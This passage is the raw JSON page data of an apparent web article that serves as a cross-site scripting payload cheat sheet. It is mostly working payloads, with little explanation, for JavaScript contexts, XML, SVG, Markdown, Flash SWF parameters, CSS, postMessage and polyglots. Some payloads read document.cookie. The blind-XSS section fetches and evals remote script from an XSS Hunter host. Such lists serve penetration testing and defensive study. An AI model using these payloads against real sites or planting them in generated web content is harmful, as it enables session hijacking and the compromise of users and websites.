onerror=alert(2)\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_28\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_28\",\"name\":\"78f7\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in JS Context\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":17,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_29\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_29\",\"name\":\"92d8\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"-(confirm)(document.domain)\\u002F\\u002F\\n; alert(1);\\u002F\\u002F\\n\\u002F\\u002F (payload without quote\\u002Fdouble quote from 
[@brutelogic](https:\\u002F\\u002Ftwitter.com\\u002Fbrutelogic)\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_30\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_30\",\"name\":\"a68d\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in files\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_31\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_31\",\"name\":\"95b8\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_32\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_32\",\"name\":\"6d5f\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cname\\u003E\\n  \\u003Cvalue\\u003E\\u003C![CDATA[\\u003Cscript\\u003Econfirm(document.domain)\\u003C\\u002Fscript\\u003E]]\\u003E\\u003C\\u002Fvalue\\u003E\\n\\u003C\\u002Fname\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_33\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_33\",\"name\":\"e70d\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in 
XML\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":10,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_34\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_34\",\"name\":\"7bd0\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Chtml\\u003E\\n\\u003Chead\\u003E\\u003C\\u002Fhead\\u003E\\n\\u003Cbody\\u003E\\n\\u003Csomething:script xmlns:something=\\\"http:\\u002F\\u002Fwww.w3.org\\u002F1999\\u002Fxhtml\\\"\\u003Ealert(1)\\u003C\\u002Fsomething:script\\u003E\\n\\u003C\\u002Fbody\\u003E\\n\\u003C\\u002Fhtml\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_35\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_35\",\"name\":\"c55a\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in SVG\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":10,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_36\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_36\",\"name\":\"597a\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003C?xml version=\\\"1.0\\\" standalone=\\\"no\\\"?\\u003E\\n\\u003C!DOCTYPE svg PUBLIC \\\"-\\u002F\\u002FW3C\\u002F\\u002FDTD SVG 1.1\\u002F\\u002FEN\\\" 
\\\"http:\\u002F\\u002Fwww.w3.org\\u002FGraphics\\u002FSVG\\u002F1.1\\u002FDTD\\u002Fsvg11.dtd\\\"\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_37\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_37\",\"name\":\"d557\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Csvg version=\\\"1.1\\\" baseProfile=\\\"full\\\" xmlns=\\\"http:\\u002F\\u002Fwww.w3.org\\u002F2000\\u002Fsvg\\\"\\u003E\\n  \\u003Cpolygon id=\\\"triangle\\\" points=\\\"0,0 0,50 50,0\\\" fill=\\\"#009900\\\" stroke=\\\"#004400\\\"\\u002F\\u003E\\n  \\u003Cscript type=\\\"text\\u002Fjavascript\\\"\\u003E\\n    alert(document.domain);\\n  \\u003C\\u002Fscript\\u003E\\n\\u003C\\u002Fsvg\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_38\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_38\",\"name\":\"1575\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in SVG (short)\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":18,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_39\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_39\",\"name\":\"bc98\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Csvg xmlns=\\\"http:\\u002F\\u002Fwww.w3.org\\u002F2000\\u002Fsvg\\\" 
onload=\\\"alert(document.domain)\\\"\\u002F\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_40\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_40\",\"name\":\"90b2\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Csvg\\u003E\\u003Cdesc\\u003E\\u003C![CDATA[\\u003C\\u002Fdesc\\u003E\\u003Cscript\\u003Ealert(1)\\u003C\\u002Fscript\\u003E]]\\u003E\\u003C\\u002Fsvg\\u003E\\n\\u003Csvg\\u003E\\u003CforeignObject\\u003E\\u003C![CDATA[\\u003C\\u002FforeignObject\\u003E\\u003Cscript\\u003Ealert(2)\\u003C\\u002Fscript\\u003E]]\\u003E\\u003C\\u002Fsvg\\u003E\\n\\u003Csvg\\u003E\\u003Ctitle\\u003E\\u003C![CDATA[\\u003C\\u002Ftitle\\u003E\\u003Cscript\\u003Ealert(3)\\u003C\\u002Fscript\\u003E]]\\u003E\\u003C\\u002Fsvg\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_41\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_41\",\"name\":\"bc4e\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in Markdown\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":15,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_42\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_42\",\"name\":\"33d2\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"[a](javascript:prompt(document.cookie))\\n[a](j a v a s c r i p 
t:prompt(document.cookie))\\n[a](data:text\\u002Fhtml;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\\n[a](javascript:window.onerror=alert;throw%201)\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_43\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_43\",\"name\":\"8ba2\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in SWF flash application\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":28,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_44\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_44\",\"name\":\"1187\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Browsers other than IE: http:\\u002F\\u002F0me.me\\u002Fdemo\\u002Fxss\\u002Fxssproject.swf?js=alert(document.domain);\\nIE8: http:\\u002F\\u002F0me.me\\u002Fdemo\\u002Fxss\\u002Fxssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}\\nIE9: 
http:\\u002F\\u002F0me.me\\u002Fdemo\\u002Fxss\\u002Fxssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"A\",\"start\":24,\"end\":88,\"href\":\"http:\\u002F\\u002F0me.me\\u002Fdemo\\u002Fxss\\u002Fxssproject.swf?js=alert(document.domain);\",\"anchorType\":\"LINK\",\"userId\":null,\"linkMetadata\":null},{\"__typename\":\"Markup\",\"type\":\"A\",\"start\":94,\"end\":171,\"href\":\"http:\\u002F\\u002F0me.me\\u002Fdemo\\u002Fxss\\u002Fxssproject.swf?js=try{alert(document.domain)}catch(e){\",\"anchorType\":\"LINK\",\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_45\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_45\",\"name\":\"f9a2\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in SWF flash application\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":28,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_46\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_46\",\"name\":\"2596\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"flashmediaelement.swf?jsinitfunctio%gn=alert`1`\\nflashmediaelement.swf?jsinitfunctio%25gn=alert(1)\\nZeroClipboard.swf?id=\\\\\\\"))} catch(e) {alert(1);}\\u002F\\u002F\u0026width=1000\u0026height=1000\\nswfupload.swf?movieName=\\\"]);}catch(e){}if(!self.a)self.a=!alert(1);\\u002F\\u002F\\nswfupload.swf?buttonText=test\\u003Ca href=\\\"javascript:confirm(1)\\\"\\u003E\\u003Cimg 
src=\\\"https:\\u002F\\u002Fweb.archive.org\\u002Fweb\\u002F20130730223443im_\\u002Fhttp:\\u002F\\u002Fappsec.ws\\u002FExploitDB\\u002FcMon.jpg\\\"\\u002F\\u003E\\u003C\\u002Fa\\u003E\u0026.swf\\nplupload.flash.swf?%#target%g=alert\u0026uid%g=XSS\u0026\\nmoxieplayer.swf?url=https:\\u002F\\u002Fgithub.com\\u002Fphwd\\u002Fpoc\\u002Fblob\\u002Fmaster\\u002Fvid.flv?raw=true\\nvideo-js.swf?readyFunction=alert(1)\\nplayer.swf?playerready=alert(document.cookie)\\nplayer.swf?tracecall=alert(document.cookie)\\nbanner.swf?clickTAG=javascript:alert(1);\\u002F\\u002F\\nio.swf?yid=\\\\\\\"));}catch(e){alert(1);}\\u002F\\u002F\\nvideo-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29\\nbookContent.swf?currentHTMLURL=data:text\\u002Fhtml;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4\\nflashcanvas.swf?id=test\\\\\\\"));}catch(e){alert(document.domain)}\\u002F\\u002F\\nphpmyadmin\\u002Fjs\\u002Fcanvg\\u002Fflashcanvas.swf?id=test\\\\”));}catch(e){alert(document.domain)}\\u002F\\u002F\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"CODE\",\"start\":0,\"end\":1046,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_47\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_47\",\"name\":\"af79\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in CSS\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":10,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_48\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_48\",\"name\":\"8678\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003C!DOCTYPE 
html\\u003E\\n\\u003Chtml\\u003E\\n\\u003Chead\\u003E\\n\\u003Cstyle\\u003E\\ndiv  {\\n    background-image: url(\\\"data:image\\u002Fjpg;base64,\\u003C\\\\\\u002Fstyle\\u003E\\u003Csvg\\u002Fonload=alert(document.domain)\\u003E\\\");\\n    background-color: #cccccc;\\n}\\n\\u003C\\u002Fstyle\\u003E\\n\\u003C\\u002Fhead\\u003E\\n  \\u003Cbody\\u003E\\n    \\u003Cdiv\\u003Elol\\u003C\\u002Fdiv\\u003E\\n  \\u003C\\u002Fbody\\u003E\\n\\u003C\\u002Fhtml\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_49\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_49\",\"name\":\"284c\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in PostMessage\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_50\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_50\",\"name\":\"9b32\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"If the target origin is an asterisk (*), the message can be sent to any domain that has a reference to the child page.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"EM\",\"start\":0,\"end\":118,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_51\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_51\",\"name\":\"2a58\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Chtml\\u003E\\n\\u003Cbody\\u003E\\n    \\u003Cinput type=button value=\\\"Click Me\\\" 
id=\\\"btn\\\"\\u003E\\n\\u003C\\u002Fbody\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_52\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_52\",\"name\":\"aba8\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cscript\\u003E\\ndocument.getElementById('btn').onclick = function(e){\\n    window.poc = window.open('http:\\u002F\\u002Fwww.redacted.com\\u002F#login');\\n    setTimeout(function(){\\n        window.poc.postMessage(\\n            {\\n                \\\"sender\\\": \\\"accounts\\\",\\n                \\\"url\\\": \\\"javascript:confirm('XSS')\\\",\\n            },\\n            '*'\\n        );\\n    }, 2000);\\n}\\n\\u003C\\u002Fscript\\u003E\\n\\u003C\\u002Fhtml\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_53\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_53\",\"name\":\"c0d0\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Blind XSS\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_54\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_54\",\"name\":\"dea0\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS Hunter\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":10,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_55\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_55\",\"name\":\"474b\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS Hunter allows you to find all kinds of cross-site scripting 
vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_56\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_56\",\"name\":\"0d2c\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\\"\\u003E\\u003Cscript src=\\u002F\\u002Fyoursubdomain.xss.ht\\u003E\\u003C\\u002Fscript\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_57\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_57\",\"name\":\"03b6\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"javascript:eval('var a=document.createElement(\\\\'script\\\\');a.src=\\\\'https:\\u002F\\u002Fyoursubdomain.xss.ht\\\\';document.body.appendChild(a)')\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_58\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_58\",\"name\":\"7ecb\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cscript\\u003Efunction b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(\\\"load\\\", b);a.open(\\\"GET\\\", 
\\\"\\u002F\\u002Fyoursubdomain.xss.ht\\\");a.send();\\u003C\\u002Fscript\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_59\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_59\",\"name\":\"e819\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cscript\\u003E$.getScript(\\\"\\u002F\\u002Fyoursubdomain.xss.ht\\\")\\u003C\\u002Fscript\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_60\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_60\",\"name\":\"df9f\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Polyglot XSS\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_61\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_61\",\"name\":\"17cb\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Polyglot XSS — 0xsobky\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":22,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_62\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_62\",\"name\":\"af81\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"jaVasCript:\\u002F*-\\u002F*`\\u002F*\\\\`\\u002F*'\\u002F*\\\"\\u002F**\\u002F(\\u002F* *\\u002FoNcliCk=alert() 
)\\u002F\\u002F%0D%0A%0D%0A\\u002F\\u002F\\u003C\\u002FstYle\\u002F\\u003C\\u002FtitLe\\u002F\\u003C\\u002FteXtarEa\\u002F\\u003C\\u002FscRipt\\u002F--!\\u003E\\\\x3csVg\\u002F\\u003CsVg\\u002FoNloAd=alert()\\u002F\\u002F\\u003E\\\\x3e\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_63\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_63\",\"name\":\"719c\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Polyglot XSS — Ashar Javed\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":26,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_64\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_64\",\"name\":\"8a6d\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\\"\\u003E\\u003E\\u003Cmarquee\\u003E\\u003Cimg src=x onerror=confirm(1)\\u003E\\u003C\\u002Fmarquee\\u003E\\\" \\u003E\\u003C\\u002Fplaintext\\\\\\u003E\\u003C\\u002F|\\\\\\u003E\\u003Cplaintext\\u002Fonmouseover=prompt(1) \\u003E\\u003Cscript\\u003Eprompt(1)\\u003C\\u002Fscript\\u003E@gmail.com\\u003Cisindex formaction=javascript:alert(\\u002FXSS\\u002F) type=submit\\u003E'--\\u003E\\\" \\u003E\\u003C\\u002Fscript\\u003E\\u003Cscript\\u003Ealert(1)\\u003C\\u002Fscript\\u003E\\\"\\u003E\\u003Cimg\\u002Fid=\\\"confirm\u0026lpar; 1)\\\"\\u002Falt=\\\"\\u002F\\\"src=\\\"\\u002F\\\"onerror=eval(id\u0026%23x29;\\u003E'\\\"\\u003E\\u003Cimg src=\\\"http: 
\\u002F\\u002Fi.imgur.com\\u002FP8mL8.jpg\\\"\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_65\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_65\",\"name\":\"ddac\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Polyglot XSS — Mathias Karlsson\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":31,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_66\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_66\",\"name\":\"4fa1\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\\" onclick=alert(1)\\u002F\\u002F\\u003Cbutton ‘ onclick=alert(1)\\u002F\\u002F\\u003E *\\u002F alert(1)\\u002F\\u002F\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_67\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_67\",\"name\":\"644e\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Polyglot XSS — Rsnake\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":21,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_68\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_68\",\"name\":\"db6d\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"';alert(String.fromCharCode(88,83,83))\\u002F\\u002F';alert(String. 
fromCharCode(88,83,83))\\u002F\\u002F\\\";alert(String.fromCharCode (88,83,83))\\u002F\\u002F\\\";alert(String.fromCharCode(88,83,83))\\u002F\\u002F-- \\u003E\\u003C\\u002FSCRIPT\\u003E\\\"\\u003E'\\u003E\\u003CSCRIPT\\u003Ealert(String.fromCharCode(88,83,83)) \\u003C\\u002FSCRIPT\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_69\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_69\",\"name\":\"7bad\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Polyglot XSS — Daniel Miessler\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":30,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_70\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_70\",\"name\":\"afc0\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"';alert(String.fromCharCode(88,83,83))\\u002F\\u002F';alert(String.fromCharCode(88,83,83))\\u002F\\u002F\\\";alert(String.fromCharCode(88,83,83))\\u002F\\u002F\\\";alert(String.fromCharCode(88,83,83))\\u002F\\u002F--\\u003E\\u003C\\u002FSCRIPT\\u003E\\\"\\u003E'\\u003E\\u003CSCRIPT\\u003Ealert(String.fromCharCode(